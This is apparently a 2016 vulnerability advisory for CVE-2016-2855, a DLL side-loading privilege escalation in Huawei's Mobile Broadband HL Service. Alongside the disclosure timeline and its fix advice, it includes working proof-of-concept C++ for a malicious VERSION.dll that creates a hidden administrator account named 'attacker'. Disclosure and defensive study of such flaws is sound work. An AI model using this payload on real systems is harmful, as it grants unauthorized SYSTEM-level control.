Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation

`Huawei Mobile Broadband HL Service Local Privilege Escalation  
  
Metadata  
===================================================  
Release Date: 12-05-2016  
Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc)  
Affected versions: up to the current 22.001.25.00.03 on x86 and x64  
Tested on: Windows 7 32 bit and 64 bit  
CVE : CVE-2016-2855  
URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/  
Video: https://youtu.be/MwtjE2PmEJU  
Vulnerability Status: Fixed  
  
Abstract  
===================================================  
The Windows service "Mobile Broadband HL Service" as installed by many? Huawei 3G/LTE modems is vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access.  
  
Disclosure Timeline  
===================================================  
6.3.2016: Issue privately reported to Huawei  
6.3.2016: CVE number requested  
7.3.2016: MITRE assigned CVE-2016-2855  
14.3.2016: Huawei verified the issue and is working on a fix  
9.5.2016: Huawei informed me that the issue has been fixed in their latest release. However it is up to the carriers to push the fix to the devices.  
  
Technical Details  
===================================================  
The service executable for the "Mobile Broadband HL Service" service is located in "C:\ProgramData\MobileBrServ". As the file permissions of this folder allow normal users to add files a malicious local attacker can drop a DLL named VERSION.dll into this folder. During the next boot this DLL is loaded and executed as part of the service launch. This causes a Local Privilege Escalation as this service is run as LOCAL SYSTEM.  
  
Proof of Concept  
===================================================  
#include <process.h>  
  
/*   
To compile 32bit dll:  
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll  
  
Put into C:\ProgramData\MobileBrServ and reboot your system -> a new user will be added  
*/  
  
/* export all required functions - use Dependency Walker to check what is needed */  
extern "C"  
{  
__declspec(dllexport) int GetFileVersionInfoA();  
__declspec(dllexport) int GetFileVersionInfoSizeA();  
__declspec(dllexport) int VerQueryValueA();  
}  
  
/*   
Implement DLLMain with common datatypes so we don't have to include windows.h.   
Otherwise this would cause several compile errors because of the already known but reexported functions.  
*/  
int DllMain(void* hinst, unsigned long* reason, void* reserved) {  
system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c "echo>%tmp%\dll_loaded"  
system("net user attacker Batman42 /add");  
system("net localgroup Administrators attacker /add");  
  
return 0;  
}  
  
/* Implement stubs of our exports */  
int GetFileVersionInfoA() {  
return 0;  
}  
  
int GetFileVersionInfoSizeA() {  
return 0;  
}  
  
int VerQueryValueA() {  
return 0;  
}  
  
Suggested Solution  
===================================================  
The correct solution to prevent this attack is so change the filesystem ACLs so that normal users are prohibited from creating files and directories within the C:\ProgramData\MobileBrServ folder.  
  
Workaround  
===================================================  
Until Huawei pushes a fix the filesystem ACLs should be updated manually to prevent normal users to write anything into the service directory (C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.  
  
`